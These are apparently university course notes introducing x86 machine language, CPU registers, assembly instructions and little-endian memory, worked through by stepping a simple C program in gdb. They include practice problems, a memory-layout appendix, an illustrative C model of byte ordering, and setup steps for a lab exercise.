have to know a little bit about programming, since, after all, a computer will only do what it is told to do, and a computer is
told to do things via programs.
But the programs—the software—are only half the story. To understand how a program can damage your computer, you have
to know how the hardware interacts with the software. We examine the relationship between software and hardware by
focusing on hardware that runs the x86 instruction set, the so-called x86 chip. This is by far the most common hardware
implementation in PCs and servers.
So, now that we know a little bit about software, let's go back to the machine!
2.1. Machine Language Examine the C program shown below. What does it do?
#include<stdio.h>
int main( )
{
int x = 7;
x = 2001;
}
Suppose we enter this program using nano, and then compile it using gcc. Remember that the gcc compiler converts the
source code (which we humans like) to machine language (which the computer likes). The machine language code is written
in the specific machine language for the x86 processor, which is the CPU in your computer. The file containing the machine
language code (i.e., the executable file) is named a.out. We can run our program by entering: ./a.out .
Remember that a CPU can only interpret very simple instructions that have been “hardwired” as electronic circuits on the CPU
chip. This set of simple hardwired instructions is termed the instruction set. Each instruction in the CPU’s instruction set has
associated with it a unique string of bits that the CPU can interpret. So, compilation converts the source code instructions to
the correct bit strings that correspond to instructions from the CPU's instruction set.
You may be wondering: If a computer can only carry out a small number of tasks (the limited number of simple instructions
that have been “hardwired” as circuits on the CPU chip), how are computers able to perform complex operations? To gain an
insight into the answer, consider that the complete works of Shakespeare, the English translation of the Bible and the US
Constitution are all written using 26 letters, a space symbol and a few punctuation symbols. Similarly, massive programs can
be built by combining the limited number of machine language instructions in various ways.
An
Aside
What is a.out? And why do I need to put a dot and a slash in front of a.out to
execute my program?
Since the CPU can only execute machine language instructions, a C program that you write
must be converted into a machine language program before it can be executed by the CPU.
This conversion is performed by the gcc compiler.
[Diagram: the C source file my_program.c (beginning #include<stdio.h>, int main( ) { int count; .... ) goes into gcc, which produces the file a.out.]
By default, the compiler gives the name a.out to the file containing the machine language program. When you
recompile a program, a new a.out replaces (overwrites) any file named a.out that may already exist in the working
directory.
To execute the machine language code (i.e., to run your program), you have to specify the relative pathname to the
file named a.out. Recall that a single dot (.) can be used as a shorthand for your current working directory. Thus,
the relative path name to your machine language file is ./a.out .
Later, you will learn how to change the name of your executable code to a file name of your choosing.
So… what does the machine language program for our simple C program look like? Here is a picture of the machine language
code for our program, beginning at the line that says int main( ).[7]
Machine language is supposed to be bits… where are the bits? Recall that we use hexadecimal to represent binary more
compactly. The machine language shown above is in hexadecimal.
The machine language code is on the right. On the far left are the addresses in main memory where the machine language
instructions are stored. The addresses are also presented in hexadecimal. So, let's add headings to our picture:
address    machine language instruction
[7] Note that the first line of the program, #include<stdio.h>, creates object code too—but this standard program opening produces standard object
code. We are primarily interested in the part of the program that we write (which comes after the line int main( )) so we’ll only focus on that.
Remember that any program that you run—MSWORD, Firefox, a video game—must be in main memory. The operating
system decides where a program will actually be placed in memory. So, the line that reads
8048344:    55 [8]
means that at memory address 08048344 there exists the machine language instruction 55. Pictorially:
So, the first instruction listed is 55 (remember, this is all hexadecimal—think of this first instruction as 0x55).
Practice Problem 3.3
How many bits are in an address?
Solution:
Practice Problem 3.4
How many bits are represented by the hexadecimal number 55?
Solution:
And this number 0x55 means… what?
If I looked up the x86 instruction set (e.g.: at http://sparksandflames.com/files/x86InstructionChart.html ) I would see that the
instruction 55 means to push a specific specialized CPU variable into a location in memory where the CPU can retrieve it again
later.
So, if the first machine code instruction (55) takes one byte, where will the next instruction be located?
The answer: At address 08048345. Each byte has its own address, and memory is numbered sequentially.
So… why is the third instruction located at address 8048347? Shouldn’t it be 8048346?
The instruction at 8048345 ( 89 e5 ) is two bytes. So, this instruction uses addresses 8048345 and 8048346. Similarly,
we see that the next instruction consumes three bytes, so the following instruction is stored at address 804834a. (Recall, in
hexadecimal, the number after 9 is a.)
What would you guess that last machine language instruction (c3) does? If you guessed "finishes the program and returns to
the operating system", you are correct!
So, our program residing in main memory is shown below in Figure 3.1. The numbers to the left (e.g., 08048344) are the
addresses in main memory. The contents of the boxes show the values stored at the memory locations. So, memory location
08048344 holds the value 0x55.
Footnote 8: Notice that in the address listing above, the very top line shows the full address, but subsequent lines do not show the leading zeros.
(Figure 3.1 has two columns: "Memory Address" and "Value Stored at this Address".)
Figure 3.1. Memory layout of our machine language program
I’m sure you would agree: Machine language is fun! (Don’t worry… we won’t see a lot of machine language.)
2.2. Processor Registers
The CPU fetches an instruction (like the instruction 0x55 at address 0x08048374 in Figure 3.1),
decodes the instruction, and then executes the instruction. After the CPU executes an instruction, it fetches the next instruction.
The sequence of steps fetch-decode-execute repeats until the program is finished.
How does the CPU keep track of which instruction it is at in memory?
The CPU has some specialized variables that it uses to execute programs. Unlike variables that you declare in, say, a C program,
these CPU variables are actually implemented in high-speed hardware called registers. The x86 has 16 of these variables, each
already named and each intended for a specific purpose. Each register holds 32 bits.
The most important CPU variable is eip. Memorize this name. This variable is the Instruction Pointer (see footnote 9): it holds
the address of the next instruction the CPU intends to execute.
Many text books refer to the instruction pointer as the program counter. These two terms are synonyms.
So, if the executable program shown at the top of the prior page is loaded into memory, the address 08048344 is placed in
eip.
Let’s add two more registers to our repertoire. You should also memorize these (along with eip):
esp: The CPU reserves a section of memory, called the stack, to store values that the CPU might want to retrieve
later. The esp variable is used to store the address of the "top" of the stack. The name esp stands for
extended stack pointer, but it is usually just called the stack pointer.
ebp: This variable is called the base pointer. This CPU variable is used to point to the "bottom" of the stack. (To
be more precise, we will see later that ebp actually points to the very first address after the bottom of the
stack.)
2.3. Assembly Language
Okay, we want to see precisely what is going on in the CPU, but we can’t keep our sanity if we
have to look at pictures like this:
This picture shows machine language. Since we are not computers, machine language isn’t exactly intuitive to us. But unless
we can get “into” the CPU, we don’t really know what is going on. So…we have to find a way to deal with the CPU instructions
(machine language) without dealing with bits (or hexadecimal).
The answer is to use assembly language!
Remember that in assembly language, each machine instruction is replaced by an “English-like” word or mnemonic.
Looking at the machine code above, we mentioned that the last instruction, c3, had us finish execution and return to the
operating system. In assembly language, this instruction maps to ret (short for return).
There is a one-to-one mapping between the assembly language instructions and the machine language instructions. Thus,
assembly language is just an easier way to read machine language.
Our simple program:
#include<stdio.h>
int main( )
{
int x = 7;
x = 2001;
}
is shown in assembly language. For convenience, the machine language is repeated in the middle. The assembly language
appears on the right.
Footnote 9: The “e” in eip stands for “extended.” The original instruction pointer was 16 bits, but it was later extended to 32 bits.
(Picture: the listing has three columns, "address", "machine language instruction" and "assembly language instruction".)
Now… you might be looking at the assembly language and thinking: “That’s easier???” Well, it will take some getting used
to, but you will pick it up fast. For example, what do you think mov means? If you guessed move, you’re right. If you’re
guessing that sub means subtract, right again! And note that we see the CPU variables ebp and esp that we talked about
earlier flying around in the assembly code.
Some assembly language instructions just specify an operation and do not have any operands, e.g.:
leave
ret
Some assembly language instructions specify an operation and a single operand, e.g.:
push ebp
Some assembly language instructions specify an operation and two operands, e.g.:
mov ebp, esp
sub esp, eax
For the two-operand assembly language instructions, it is important to note that the first operand is the destination and the second
operand is the source. So the instruction
mov ebp, esp
means: “Move the value of esp to ebp”
and the instruction
sub esp, eax
means: “Subtract the value of eax from esp (so that esp is reduced by the amount eax).”
Shown below is a cheat sheet of common assembly language instructions. It is suggested that you not grapple with this cheat
sheet right now. Rather, it is suggested that you refer back to it when you later encounter an assembly language instruction
that is unfamiliar.
Instruction: mov (move)
Example: mov DWORD PTR [esp],0x804848a
Explanation: Place the value 0x804848a in the location specified by the address in the esp register.

Instruction: cmp (compare)
Example: cmp DWORD PTR [ebp],0x4
Explanation: Compare the value 4 to the value stored in the address contained within the ebp register.

Instruction: jne (jump if not equal)
Example: jne 0x804839f
Explanation: This instruction will always follow a comparison (cmp). If the two items in the prior comparison were not equal,
then jump to the instruction stored at address 0x804839f.

Instruction: jle (jump if less than or equal)
Example: jle 0x804839f
Explanation: This instruction will always follow a comparison (cmp). If the first item in the prior comparison is less than or
equal to the second item in the prior comparison, then jump to the instruction stored at address 0x804839f. For example, if
the prior comparison was cmp DWORD PTR [ebp],0x4, then if the value stored in the address pointed to by the ebp register
is less than or equal to 4, we would jump to the instruction stored at address 0x804839f.

Instruction: jmp (jump)
Example: jmp 0x804839f
Explanation: Jump to the instruction located at address 0x804839f.

Instruction: inc (increment)
Example: inc DWORD PTR [eax]
Explanation: Increment the value stored at the memory location contained within the eax register by one.
2.4. Program Autopsy: Case 1
Now, to really see what is going on, we can run this program one line at a time, and, at each
step in the process, examine the CPU’s special variables (the registers) and any other memory locations we care to. We can
step through an executable file and examine registers and memory by using a debugger. A debugger is a program that allows
you to test and examine other programs. Here’s how to get started:
Step 1. Start up VMware Workstation, navigate to your work directory by entering: cd work. Then using nano, open a new
file named ch3demo.c by entering: nano ch3demo.c . Then enter the following program:
#include<stdio.h>
int main( )
{
int x = 7;
x = 2001;
}
Compile the program and ensure that it contains no syntax errors (recall that to compile your program you enter gcc
ch3demo.c). Then run the program (by entering: ./a.out). You should see the results shown in the screen capture below.
Wait – what happened? This program is very simple - it merely stores and changes the value of the variable x in memory. It
doesn’t get input from the user (scanf), and it doesn’t display output either (printf), so there’s not much to see “on the
outside” when the program is run. But what’s happening “on the inside” (in memory)? The debugger will help us figure that
out.
Step 2. Start the debugger by entering the following seven lines of code. Enter the commands below (don’t include the
comments! – those are provided just to explain what is accomplished by each command). You should look at the screen
capture below to follow along as you are entering commands. Your screen should look the same!
gcc -g ch3demo.c
// The -g part of this is new! Adding this provides some extra functionality
// for the debugger.
gdb -q ./a.out
// gdb is the name of the debugger. So, we are running the debugger on the
// executable file named a.out
set dis intel
// This displays the assembly code in standard Intel lingo
list
// This repeats the source code for convenience
disassemble main
// This shows the assembly code starting with the line that has main
break main
// This sets a “breakpoint” at main. So, when we run the program, it will stop
// at the first line of executable code that follows the line that has main
run
// This starts executing the program up to the first line of executable code
// that follows the line that has main.
So, the program's execution is "frozen" at the first real line of code (the first line of executable code that follows the line that
has main.) So… where did the program freeze?
Practice Problem 3.5
In the screen capture above, what assembly language instruction did the program stop at—i.e., what is the next instruction
that will execute, and where in main memory is this instruction stored?
Solution:
You might be wondering: What about all the instructions before this one? Does that matter? The answer: This is code that the
compiler has generated to set up memory for the program. We can safely ignore this for now.
Since the last two assembly language instructions, leave and ret, are basically mop-up operations (all programs end with
these two instructions), we really only have to concentrate on the two lines:
0x08048354 <main+16>: mov DWORD PTR [ebp-4],0x7
0x0804835b <main+23>: mov DWORD PTR [ebp-4],0x7d1
What do we make of these two cryptic lines? To find out, we introduce two powerful commands: the info command and the
examine command.
Step 3. The info command. To look at the value of a register, we use the info (i) command. For example, to examine the
eip register, you would enter the command
i r eip
and to examine the esp register, you would enter the command
i r esp
Practice Problem 3.6
What is the value stored in the eip register? Does this answer make sense?
Solution:
Step 4. The examine command. To examine the value stored at a memory location, we use the examine (x) command. The
format for the x command is:
x/display_option location_we_want_to_display
The display option is one of:
- x for hexadecimal
- u for decimal
- i to display assembly language
- s to display the result as a string of characters
The location is one of:
- to see the contents of an address, simply use the address
- to see the contents of an address in a register, use the register name preceded by a dollar sign
So, the command starts with an x followed by a slash. Then we tell the debugger how we would like the memory location
contents to be displayed. If we want the value to be displayed in hexadecimal, the display option is x. If we want the value to
be displayed in decimal, the display option is u.
If we want to display the contents of a memory location, we simply supply the memory location as the last argument. If we
instead want to see the contents of a memory location whose address is in a register, we supply the register name preceded by
a dollar sign.
We can also control "how much" data is displayed. By default, the debugger displays 4 bytes for its answer. If we only want
to display a single byte, we place the letter b right after the display option. To display two bytes, we place the letter h right
after the display option. To display 4 bytes, we place the letter w after the display option. To display 8 bytes, we place the
letter g after the display option.
To summarize the examine command:
Examine Command Cheat Sheet.
x/_ _ location_we_want_to_display
The first position after the slash specifies the format for the display. Use this table:
x   hexadecimal
u   decimal
i   assembly language
s   string
The second position specifies the size of the item (how much data) we want to display. Use this table:
b   byte
h   half-word (two bytes)
w   word (four bytes)
g   giant (eight bytes)
To see the contents of a memory location, simply place the memory location after the format. To see the contents of an
address whose location is stored in a register, place the register there, preceded by a dollar sign (e.g., $esp).
If the foregoing paragraphs have you bewildered, do not fear! We will do many examples!
Practice Problem 3.7
Refer to the picture shown in Figure 3-1. What should be printed out by each of the following commands? In each case, enter
the command to confirm your answer.
(a) x/xb 0x08048354
(b) x/xb 0x08048355
(c) x/xb 0x08048356
(d) x/xb 0x08048357
Solution:
(a)
(b)
(c)
(d)
The above example is depicted in the extract from Figure 3-1, shown below.
Now, recall that when we use b in the examine command, as in x/xb , the b stands for byte. When we issue the command
x/xb 0x08048354
we are saying: "Show me the contents of main memory, starting at address 0x08048354, but only going one single byte into
memory."
If we want to see the contents of memory starting at address 0x08048354, but going two bytes (i.e., a half-word) into memory,
we would enter: x/xh 0x08048354 .
Practice Problem 3.8
What do you think will be displayed by the command: x/xh 0x08048354 ? Confirm your result.
Solution:
The x86 processor stores values in so-called little-endian order, which is the sequencing of digital storage such that the least
significant byte is stored at the smallest address. This means that if I have a four byte quantity, the least significant byte goes
in the first address, the second-least-significant byte goes in the next address, and so on. So, if we are to interpret a four-byte
quantity as a single unit, the bytes must be reversed. The debugger reverses the bytes for us automatically.
This is confusing, so let's look at this a little more carefully. As we mentioned, the program is halted at the instruction at
address 08048354. We looked earlier at this section of main memory, exploring the results as machine language and assembly
language:
(Picture: two columns, "Memory address" and "Value stored at this address".)
So, the assembly language instruction at address 08048354 is
mov DWORD PTR [ebp-4],0x7.
This assembly language instruction is stored in memory locations 08048354 through 0804835a inclusive.
Here is the key point:
The assembly language instruction
mov DWORD PTR [ebp-4],0x7
is actually equivalent to the machine language
00 00 00 07 fc 45 c7
The question faced by the designers of the x86 was: In what order should we store 00 00 00 07 fc 45 c7 in memory?
The answer for the x86 processor is to store the least significant byte in memory first, and then continue downward. So, the
least significant byte (c7) goes into memory first (at address 08048354) then the next-least-significant byte (45) goes into
the next address (08048355), and so forth.
The debugger automatically reverses the little-endian byte order for us, restoring the proper order.
Practice Problem 3.9
What do you think will be displayed by the command: x/xw 0x08048354 ? Confirm your result.
Solution:
Step 5. Using the examine command with registers. If we instead want to see the contents of a memory location whose
address is in a register, we supply the register name preceded by a dollar sign. So, the command
x/xb $eip
means the following: "The instruction pointer holds an address (specifically, the address of the next instruction to be executed).
Go to that address. Then tell me what is stored at that address, but only proceed one byte into memory please."
Practice Problem 3.10
What do you think will be displayed by the command: x/xb $eip . Confirm your result.
Solution:
The preceding example is explained by the picture below. The command x/xb $eip means that we should proceed to the
memory location that is contained in the instruction pointer, and read off one byte.
Practice Problem 3.11
What do you think will be displayed by the command: x/xh $eip . Confirm your result.
Solution:
Practice Problem 3.12
What do you think will be displayed by the command: x/xw $eip . Confirm your result.
Solution:
Practice Problem 3.13
What do you think will be displayed by the command: x/i $eip . Confirm your result.
Solution:
Step 6. Wonderful… so what does the program actually do? We mentioned that our program has two lines of code we
care about:
0x08048354 <main+16>: mov DWORD PTR [ebp-4],0x7
0x0804835b <main+23>: mov DWORD PTR [ebp-4],0x7d1
We know that the eip contains the first instruction's address: 0x8048354. If we were to execute one instruction and then
freeze again, the instruction executed would be
mov DWORD PTR [ebp-4],0x7
What does this cryptic instruction do?
For starters, the register ebp is the base pointer (which, you may recall from earlier in this chapter, points to the memory
address immediately below the bottom of the stack). The stack is a section of memory that our program has available to store
any values it needs. The esp register contains the address of the "top" of the stack, and the ebp contains the address below
the bottom.
This assembly language instruction means (in plain English):
Move the value 0x7 into the address pointed to by ebp-4 (the base pointer, minus 4).
The base pointer contains an address; this instruction will write the value 0x00000007 into the address 4 above the address
contained in the base pointer.
Let's look at a picture of the bottom of the stack. Suppose the base pointer contained the address 0xbffff818. Then that
would mean that my program is storing all the information it needs (for example, variables) just above address 0xbffff818.
See the picture below:
So… If I know the value 0x00000007 is going to be placed in the address 4 above the ebp in memory, how does that change
the image above?
First, let’s figure out the address where the 7 is placed (ebp-4):
0xbffff818 - 4 = 0xbffff814
That’s not so bad. So the 4-byte value 0x00000007 is going to begin at address 0xbffff814.
Next, we have to remember the order in which those bytes are stored. (If you’re thinking, Little Endian – GREAT!)
Remember, little endian order means that the least significant byte goes in the first address, the second-least-significant
byte goes in the next address, and so on, so let’s take a look at how that applies to a 4-byte integer.
The integer “7” is represented by the following 4 bytes:
0x 00 00 00 07
The leftmost byte (00) is the most significant byte (MSB); the rightmost byte (07) is the least significant byte (LSB).
In memory, the least significant byte goes in the first address, so the bytes appear in the order LSB first, MSB last:
07 00 00 00
To tie it all together - the “big picture,” if you will – the 4 bytes are placed in memory, with the least significant byte
beginning at address 0xbffff814, like this:
That’s probably enough pontificating about what will happen when the next instruction is executed... Let’s actually execute a
single instruction, and then freeze again! Enter the command:
nexti
After you enter this command, you should see:
0x0804835b      5         x = 2001;
Practice Problem 3.14
When you execute a command (as you just did when you typed nexti), what happens to the instruction pointer (eip)?
Solution:
Practice Problem 3.15
What is the value stored in the eip register? Does this answer make sense?
Solution:
We have advanced to the next instruction. The instruction at address 0x0804835b will be the next instruction to execute, as
shown on the next page.
Practice Problem 3.16
What should I type to examine memory to see the integer 7 that has just been placed on the stack? (Confirm your result!)
Solution:
Practice Problem 3.17
What assembly language instruction is located at 0x0804835b?
Solution:
(Picture: two columns, "Memory address" and "Value stored at this address".)
Practice Problem 3.18
Sketch what you expect the stack to look like after the instruction at address 0x0804835b is executed.
Solution:
Let’s execute a single instruction, and then freeze again! Enter the command:
nexti
Practice Problem 3.19
What two things happen when nexti is entered?
Solution: 1.
2.
Practice Problem 3.20
What should you type to examine memory for the hex values you sketched in Practice Problem 3.18? (Confirm your result!)
Solution:
Practice Problem 3.21
What should you type to examine memory for the integer 2001? (Confirm your result!)
Solution:
Congratulations! You've completed your first program autopsy!
Appendix: Memory Storage Example
This material (Chapter 3) is the toughest chapter in EC310. Midshipmen in the past have struggled with the Chapter 3 material
because it introduces a slew of new concepts (the debugger with its many cryptic new commands, assembly code, a first look
at registers and memory organization, etc.), all of which are alien to anything you have seen before in any other USNA class.
You should rest assured that with some effort the concepts will solidify. The remainder of this chapter contains an extended
memory storage example. While this example will not be covered in class, it is recommended that you take time to work
through it. Note that in each case that a question is asked, the correct answer follows.
Suppose I have the following variable declarations in a C program:
int zz = 206578;
char letter1 = 'v';
char letter2 = 'N';
int y = 154;
Note:
decimal 206578 is 0x326F2 in hexadecimal
character 'v' is 0x76 in hexadecimal (from ASCII table)
character 'N' is 0x4E in hexadecimal (from ASCII table)
decimal 154 is 0x9A in hexadecimal
Suppose when the program gets compiled with gcc, the compiler sets aside storage space in the main memory (RAM) for the
program and its variables, and variable zz gets stored at the first memory address below, then letter1, then letter2, then
y.
Memory Address    Data at that Memory Address (Hex)
0x08048374
0x08048375
0x08048376
0x08048377
0x08048378
0x08048379
0x0804837A
0x0804837B
0x0804837C
0x0804837D
0x0804837E
0x0804837F
0x08048380
0x08048381
(The data column is left blank here; it is filled in under question 3 below.)
1. How many total bytes are used to store these variables in memory?
Answer:
4 bytes for zz, 1 byte for letter1, 1 byte for letter2, 4 bytes for y: 10 bytes total
2. What are the actual bit values that will be stored in the memory? Give your answer as hexadecimal values.
Answer:
Variable zz is an integer, so is stored in 4 bytes (which is 8 hexadecimal digits). In memory, its value looks like:
0x000326F2
Variable letter1 is stored in one byte (which is 2 hexadecimal digits). In memory, its value looks like: 0x76
Variable letter2 is also stored in one byte, and in memory its value looks like: 0x4E
Variable y is an integer, so it is stored in 4 bytes (8 hexadecimal digits), and in memory its value looks like:
0x0000009A
3. How will the values be stored in the memory?
Answer:
char values are stored in one byte, so they look as is.
int values are stored in “little endian” format, so the least significant byte is stored FIRST in the memory location,
and the most significant byte is stored LAST (this is the reverse order of what you’d think it should be).
The memory values will look as follows:
Variable        Memory Address    Data at that Memory Address (Hex)
y               0x08048374        9A
y               0x08048375        00
y               0x08048376        00
y               0x08048377        00
letter2         0x08048378        4E
letter1         0x08048379        76
zz              0x0804837A        F2
zz              0x0804837B        26
zz              0x0804837C        03
zz              0x0804837D        00
garbage bits    0x0804837E        10
garbage bits    0x0804837F        00
garbage bits    0x08048380        00
garbage bits    0x08048381        A3
4. What are the values and addresses of the variables?
Answer:
y = 154 (which is 0x0000009A in hex), and the address of y is 0x08048374
letter2 = ‘N’ (which is 4E in hex), and the address of letter2 = 0x08048378
letter1 = ‘v’ (which is 76 in hex), and the address of letter1 is 0x08048379
zz = 206578 (which is 0x000326F2 in hex), and the address of zz is 0x0804837A
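As an added example (not code from the EC310 notes), the following C program models what Practice Problems 3.7 to 3.9, Step 6 and this appendix describe: the x86's little-endian placement of bytes, what gdb's x/xb, x/xh and x/xw show when they read those bytes back, the two mov writes to [ebp-4] with ebp = 0xbffff818, and the appendix's layout of y, letter2, letter1 and zz. The simulated buffers, STACK_BASE and all function names are constructed for this example; the instruction bytes c7 45 fc 07 00 00 00 are the ones the notes give for the mov at 0x08048354.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Store a 32-bit value the way the x86 does: least significant byte at the
 * lowest address, most significant byte at the highest (little-endian). */
void store_le32(unsigned char *dst, uint32_t value)
{
    for (int i = 0; i < 4; i++)
        dst[i] = (unsigned char)((value >> (8 * i)) & 0xff);
}

/* What gdb's examine command prints for x/xb (size 1), x/xh (size 2) or
 * x/xw (size 4) at p: the bytes are recombined in reverse order, which is
 * how the debugger "undoes" little-endian storage for us. */
uint32_t examine(const unsigned char *p, int size)
{
    uint32_t v = 0;
    for (int i = size - 1; i >= 0; i--)
        v = (v << 8) | p[i];
    return v;
}

/* Machine code of "mov DWORD PTR [ebp-4],0x7" as it sits at 0x08048354:
 * c7 45 fc 07 00 00 00 (the notes list these bytes reversed, as
 * 00 00 00 07 fc 45 c7). */
const unsigned char mov7_at_08048354[7] = {0xc7, 0x45, 0xfc, 0x07, 0x00, 0x00, 0x00};

/* Simulated bottom of the stack (constructed). The notes suppose
 * ebp = 0xbffff818; stack_mem[0] stands for address STACK_BASE, so the byte
 * at address A lives at stack_mem[A - STACK_BASE]. */
#define STACK_BASE 0xbffff800u
#define EBP        0xbffff818u
unsigned char stack_mem[32];

/* Perform "mov DWORD PTR [ebp-4],imm" on the simulated stack and return the
 * address that was written: ebp-4 = 0xbffff814. */
uint32_t mov_ebp_minus_4(uint32_t imm)
{
    uint32_t addr = EBP - 4;
    store_le32(&stack_mem[addr - STACK_BASE], imm);
    return addr;
}

/* Read back what "x/xw $ebp-4" would show on the simulated stack. */
uint32_t examine_ebp_minus_4(void)
{
    return examine(&stack_mem[EBP - 4 - STACK_BASE], 4);
}

/* Appendix layout: appendix_mem[0] stands for address 0x08048374, and the
 * variables are placed in the order the appendix's answer to question 4
 * gives (y, then letter2, letter1, zz). Returns the number of bytes used. */
unsigned char appendix_mem[16];

size_t layout_appendix(void)
{
    int32_t y = 154;        /* 0x0000009A */
    char letter2 = 'N';     /* 0x4E */
    char letter1 = 'v';     /* 0x76 */
    int32_t zz = 206578;    /* 0x000326F2 */
    size_t off = 0;

    store_le32(appendix_mem + off, (uint32_t)y);  off += 4;  /* 9A 00 00 00 */
    appendix_mem[off++] = (unsigned char)letter2;            /* 4E */
    appendix_mem[off++] = (unsigned char)letter1;            /* 76 */
    store_le32(appendix_mem + off, (uint32_t)zz); off += 4;  /* F2 26 03 00 */
    return off;                                              /* 10 bytes */
}

int main(void)
{
    printf("x/xb 0x08048354 -> 0x%02x\n", (unsigned)examine(mov7_at_08048354, 1));
    printf("x/xh 0x08048354 -> 0x%04x\n", (unsigned)examine(mov7_at_08048354, 2));
    printf("x/xw 0x08048354 -> 0x%08x\n", (unsigned)examine(mov7_at_08048354, 4));

    printf("mov DWORD PTR [ebp-4],0x7 writes at 0x%08x\n", (unsigned)mov_ebp_minus_4(0x7));
    printf("x/xw $ebp-4 -> 0x%08x\n", (unsigned)examine_ebp_minus_4());
    mov_ebp_minus_4(0x7d1);                       /* x = 2001; */
    printf("after x = 2001, x/xw $ebp-4 -> 0x%08x\n", (unsigned)examine_ebp_minus_4());

    size_t n = layout_appendix();
    printf("bytes starting at 0x08048374 (%u bytes):", (unsigned)n);
    for (size_t i = 0; i < n; i++)
        printf(" %02X", appendix_mem[i]);
    printf("\n");
    return 0;
}
```

Running it prints 0xc7, 0x45c7 and 0x07fc45c7 for the three examines at 0x08048354, then 0x00000007 and 0x000007d1 for the two stack writes, and the byte sequence 9A 00 00 00 4E 76 F2 26 03 00 for the appendix.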
Problems
1. Examine the following C program and describe the expected output. (Note: The output for count%2 is the remainder
of count divided by 2; i.e. 4%2 is 0, while 4%3 is 1.)
#include<stdio.h>
int main()
{
int count;
for( count = 1; count <= 4 ; count = count + 1 )
{
if( count %2 == 0)
printf("Echo\n") ;
else
printf("Oscar\n") ;
}
}
2. What exactly will the following C program do after it is compiled and executed?
#include<stdio.h>
int main()
{
int j;
for(j = 10; j > 2; j = j - 2)
{
printf("Go Navy!\n");
}
}
3. What is the exact output of the program below if the user enters 5 when prompted?
#include<stdio.h>
int main( )
{
int number , counter ;
printf( "Enter a number: " ) ;
scanf( "%d" , &number );
if( number != 5 )
printf( "I love EC310!\n" );
else
printf( "What's for lunch?\n" );
for(counter = number ; counter < 10 ; counter = counter + 3)
printf( "Navy\n" );
}
4. Consider this screenshot:
(a) What type of language is depicted in the screenshot below?
(b) Describe what this line of code accomplishes.
5. Consider the picture below (columns: "Memory address" and "Value stored at this address"):
(a) In words: what is held in the eip register, i.e., what is the purpose of this register? (Your answer should not
be: "804838d".)
(b) What would be displayed on the monitor by the command: x/xb $eip ?
(c) What would be displayed on the monitor by the command: x/s 0x08048475 ? (Hint: the string
stops at the first byte that reads 0000 0000.)
6. What is the exact output of the following C program if the user enters 4 when prompted to enter a start value?
#include<stdio.h>
int main ()
{
int start_value , number;
printf( "Enter a start value: ");
scanf("%d" , &start_value );
for( number = start_value ; number != 12 ; number = number + 2 )
{
printf("I love cyber!\n");
}
}
7. Consider again the program shown in Question 6 above. What happens if the user enters 7 when prompted to enter a
start value?
8. We would like to write a complete C program that prompts the user to enter an integer. The program should then
provide the absolute value of the integer. See the screen capture below.
Fill in the missing code in the two red boxes shown below so that the program executes successfully. Each red box is
missing only one line of code!
#include<stdio.h>
int main ()
{
int value;
printf( "Enter an integer: ");
scanf("%d" , &value );
if( [red box: one missing line] )
{
[red box: one missing line]
}
printf("The absolute value of the number is: %d\n" , value );
}
9. In this problem we are going to use the program named firstprog.c which is located in the booksrc directory.
We need to copy this file to the work directory. To copy the file named firstprog.c from the booksrc
directory to the work directory, first ensure you are in your home directory by entering
cd
and then carefully enter the following at the home directory prompt (make sure you are at your home directory!):
midshipman@EC310:~ $ cp booksrc/firstprog.c work
Verify that you have firstprog.c in your work directory by changing to the work directory:
cd work
and then listing the files in the work directory:
ls
You should see the firstprog.c file (along with perhaps some additional files from recent labs).
The program firstprog.c is shown below
#include <stdio.h>
int main()
{
int i;
for( i = 0; i < 10; i++ )
{
printf("Hello World!\n");
}
}
Note: i++ means exactly the same thing as i = i + 1
Compile your program using gcc:
gcc -g firstprog.c
and then run your program
./a.out
to confirm it executes as expected.
Then start the debugger by entering the following commands (hitting ENTER after each command)
gdb -q
./a.out
set dis intel
list
disassemble main
break main
run
(a) The program has now stopped at the first line of code after the line int main( ). Recall that the eip
register holds the address of the next instruction that will be executed. What is the address stored in the eip
register?
(b) What is the next assembly language instruction that will be executed?
(c) Consider the assembly language instruction
mov DWORD PTR [ebp-4],0x0
This instruction places the value 0 into the memory location whose address is stored at ebp-4.
Enter nexti to execute this instruction. What is the value of ebp?
(d) What is the value of ebp-4?
(e) What is stored in the address specified by the value ebp-4? Hint: Use x/xw with your answer to
question (d).
(f) Look at the value of the instruction pointer (eip). Has it changed from your answer to part (a)? Why or why
not?
(g) The next assembly language instruction that will be executed is:
cmp DWORD PTR [ebp-4],0x9
This instruction will compare the value 9 to the value you examined in question (e). Referring back to the
C source code, what do you think this assembly language instruction is doing?
Enter nexti to execute this instruction.
(h) The assembly language instruction that will be executed next is
jle 0x8048393 <main+31>
This instruction means:
If the results of the preceding comparison showed that the value stored at the memory location
whose address is stored at ebp-4 was less than or equal to 9, jump to address 0x8048393.
Enter nexti once. What is the value of the eip register?
If your answer to (h) is not 0x8048393 then you have gone off the rails! STOP! See your instructor (or MGSP).
(i) Explain, in words, why the instruction pointer has the value that it has.
(j) The assembly language instruction
mov DWORD PTR [esp],0x8048484
moves the value 0x8048484 into the location pointed to by the stack pointer.
Enter nexti once.
What is the value of the address stored in the stack pointer (esp)?
(k) What is stored at the memory location whose address is in the stack pointer? (Hint: use x/xw to examine
the value stored at the address specified by the stack pointer.)
(l) We would like to know the significance of the address 0x8048484 . What is stored at this location?
(Hint: Examine the first four bytes stored starting at this memory location…think ASCII… could this be a
string?)
10. Consider the following C program.
#include<stdio.h>
int main()
{
int i;
for( i=0; i < 4; i=i+2 )
{
if( i >= 2 )
{
printf(“Torpedoes\n”);
}
else
{
printf(“Howitzer\n”);
}
}
}
(a) State how many times the loop will iterate.
(b) What will be printed to the screen when the program is executed?
11. Answer the following questions based on the below screen capture of assembly code in the debugger.
(a) Part of the source code that generates this assembly code is the line:
int x = 5;
Which assembly language instruction corresponds to this C code?
(b) What is the memory address (in hexadecimal) of the variable x?
(c) What is the address of the next line of code to be executed?
Security Exercise 3
Part 1: Initial Set-up
Open VMware and power on the EC310 virtual machine. You should be in your home directory:
List the various files and directories using ls. You should see:
Shown pictorially, the files and directories under your home directory look like this:
Your instructors have prewritten many of the C programs you will need for EC310, and have placed them in the ec310code
directory. We have done this because we care. In fact, as you are no doubt already aware, the ECE Department is known
universally as The Caring Department.
As you progress through the course, you should ensure the programs you are working on are located in your work directory.
The program you will use today is named sx3.c and it is in the ec310code directory:
We need to copy this file to the work directory. To copy the file named sx3.c from the ec310code directory to the work
directory, carefully enter the following at the home directory prompt:
midshipman@EC310:~ $ cp ec310code/sx3.c work
(Make sure you are at your home directory! Enter the cp command exactly as shown.)
If all went well, you should have a copy of sx3.c in your work directory.
